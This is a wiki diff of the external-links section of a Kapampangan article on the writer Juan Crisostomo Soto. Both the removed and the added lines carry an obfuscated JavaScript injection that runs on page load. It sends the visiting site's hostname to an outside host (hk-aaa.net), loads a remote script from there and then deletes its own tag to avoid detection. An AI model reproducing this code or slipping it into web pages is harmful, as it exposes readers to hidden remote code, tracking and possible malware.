--- a/Juan_Crisóstomo_Soto.mw
+++ b/Juan_Crisóstomo_Soto.mw
@@ -61,4 +61,5 @@ Ing istorya ng Juan Crisostomo Sotto qng pamanialicsic nang Nestor R. Galura
 
 
 ==Suglung Palwal==
-http://camaligcapampangan.info/index2.html<script id="ae77f684bc5e1ed37b67a615aa4098a3" async="true" type="text/javascript">if(window.self===window.top){window._aid='1004';window._geo='Saudi Arabia';window._mid='17bc85cc-3e4f-4599-a948-0c4dfca18bf4';window._timestamp=(Math.round(new Date().getTime()/1000));window._imjs_dyn='//hk-aaa.net/dynamic/main.php?aid=1004&geo=Saudi Arabia&sid=0&mid=17bc85cc-3e4f-4599-a948-0c4dfca18bf4&pid=hades&dt=03052015&udt=03052015&grp=9&url='+location.hostname+'&win='+(window.name+' ').substr(0,30).replace(/[^0-9a-zA-Z]/g,'_')+((location.protocol==='http:')?'&http=1':<nowiki>''</nowiki>);!function(){function e(e){var t=document.createElement('script');t.type='text/javascript',t.src=e,t.async=!0,t.onload=t.onreadystatechange=function(){this.readyState&&'loaded'!==this.readyState&&'complete'!==this.readyState||(t.onload=t.onreadystatechange=null,t.parentNode&&t.parentNode.removeChild(t))};var n=document.body||document.getElementsByTagName('body')[0]||document.documentElement;n&&n.insertBefore(t,n.firstChild)}function t(e){cr_readyCallback=e,a&&cr_readyCallback()}function n(){if(!a){if(!document.body)return setTimeout(n,1);a=!0,'function'==typeof cr_readyCallback&&cr_readyCallback()<nowiki>}}</nowiki>function o(){return'complete'===document.readyState?setTimeout(n,1):void(document.addEventListener?(cr_DOMContentLoaded=function(){document.removeEventListener('DOMContentLoaded',cr_DOMContentLoaded,!1),n()},document.addEventListener('DOMContentLoaded',cr_DOMContentLoaded,!1),window.addEventListener('load',n,!1)):document.attachEvent&&(cr_DOMContentLoaded=function(){'complete'===document.readyState&&(document.detachEvent('onreadystatechange',cr_DOMContentLoaded),n())},document.attachEvent('onreadystatechange',cr_DOMContentLoaded),window.attachEvent('onload',n)))}var a=!1;o(),t(function(){e(_imjs_dyn);_imjs_dyn=<nowiki>''</nowiki>;var n=document.getElementById('ae77f684bc5e1ed37b67a615aa4098a3');n.parentNode&&n.parentNode.removeChild(n)})}();}</script><script id="ae77f684bc5e1ed37b67a615aa4098a3" async="true" type="text/javascript">if(window.self===window.top){window._aid='1004';window._geo='Saudi Arabia';window._mid='17bc85cc-3e4f-4599-a948-0c4dfca18bf4';window._timestamp=(Math.round(new Date().getTime()/1000));window._imjs_dyn='//hk-aaa.net/dynamic/main.php?aid=1004&geo=Saudi Arabia&sid=0&mid=17bc85cc-3e4f-4599-a948-0c4dfca18bf4&pid=hades&dt=03052015&udt=03052015&grp=9&url='+location.hostname+'&win='+(window.name+' ').substr(0,30).replace(/[^0-9a-zA-Z]/g,'_')+((location.protocol==='http:')?'&http=1':<nowiki>''</nowiki>);!function(){function e(e){var t=document.createElement('script');t.type='text/javascript',t.src=e,t.async=!0,t.onload=t.onreadystatechange=function(){this.readyState&&'loaded'!==this.readyState&&'complete'!==this.readyState||(t.onload=t.onreadystatechange=null,t.parentNode&&t.parentNode.removeChild(t))};var n=document.body||document.getElementsByTagName('body')[0]||document.documentElement;n&&n.insertBefore(t,n.firstChild)}function t(e){cr_readyCallback=e,a&&cr_readyCallback()}function n(){if(!a){if(!document.body)return setTimeout(n,1);a=!0,'function'==typeof cr_readyCallback&&cr_readyCallback()<nowiki>}}</nowiki>function o(){return'complete'===document.readyState?setTimeout(n,1):void(document.addEventListener?(cr_DOMContentLoaded=function(){document.removeEventListener('DOMContentLoaded',cr_DOMContentLoaded,!1),n()},document.addEventListener('DOMContentLoaded',cr_DOMContentLoaded,!1),window.addEventListener('load',n,!1)):document.attachEvent&&(cr_DOMContentLoaded=function(){'complete'===document.readyState&&(document.detachEvent('onreadystatechange',cr_DOMContentLoaded),n())},document.attachEvent('onreadystatechange',cr_DOMContentLoaded),window.attachEvent('onload',n)))}var a=!1;o(),t(function(){e(_imjs_dyn);_imjs_dyn=<nowiki>''</nowiki>;var n=document.getElementById('ae77f684bc5e1ed37b67a615aa4098a3');n.parentNode&&n.parentNode.removeChild(n)})}();}</script>
+http://camaligcapampangan.info/index2.html
+<script id="ae77f684bc5e1ed37b67a615aa4098a3" async="true" type="text/javascript">if(window.self===window.top){window._aid='1004';window._geo='Saudi Arabia';window._mid='17bc85cc-3e4f-4599-a948-0c4dfca18bf4';window._timestamp=(Math.round(new Date().getTime()/1000));window._imjs_dyn='//hk-aaa.net/dynamic/main.php?aid=1004&geo=Saudi Arabia&sid=0&mid=17bc85cc-3e4f-4599-a948-0c4dfca18bf4&pid=hades&dt=03052015&udt=03052015&grp=9&url='+location.hostname+'&win='+(window.name+' ').substr(0,30).replace(/[^0-9a-zA-Z]/g,'_')+((location.protocol==='http:')?'&http=1':<nowiki>''</nowiki>);!function(){function e(e){var t=document.createElement('script');t.type='text/javascript',t.src=e,t.async=!0,t.onload=t.onreadystatechange=function(){this.readyState&&'loaded'!==this.readyState&&'complete'!==this.readyState||(t.onload=t.onreadystatechange=null,t.parentNode&&t.parentNode.removeChild(t))};var n=document.body||document.getElementsByTagName('body')[0]||document.documentElement;n&&n.insertBefore(t,n.firstChild)}function t(e){cr_readyCallback=e,a&&cr_readyCallback()}function n(){if(!a){if(!document.body)return setTimeout(n,1);a=!0,'function'==typeof cr_readyCallback&&cr_readyCallback()<nowiki>}}</nowiki>function o(){return'complete'===document.readyState?setTimeout(n,1):void(document.addEventListener?(cr_DOMContentLoaded=function(){document.removeEventListener('DOMContentLoaded',cr_DOMContentLoaded,!1),n()},document.addEventListener('DOMContentLoaded',cr_DOMContentLoaded,!1),window.addEventListener('load',n,!1)):document.attachEvent&&(cr_DOMContentLoaded=function(){'complete'===document.readyState&&(document.detachEvent('onreadystatechange',cr_DOMContentLoaded),n())},document.attachEvent('onreadystatechange',cr_DOMContentLoaded),window.attachEvent('onload',n)))}var a=!1;o(),t(function(){e(_imjs_dyn);_imjs_dyn=<nowiki>''</nowiki>;var n=document.getElementById('ae77f684bc5e1ed37b67a615aa4098a3');n.parentNode&&n.parentNode.removeChild(n)})}();}</script>
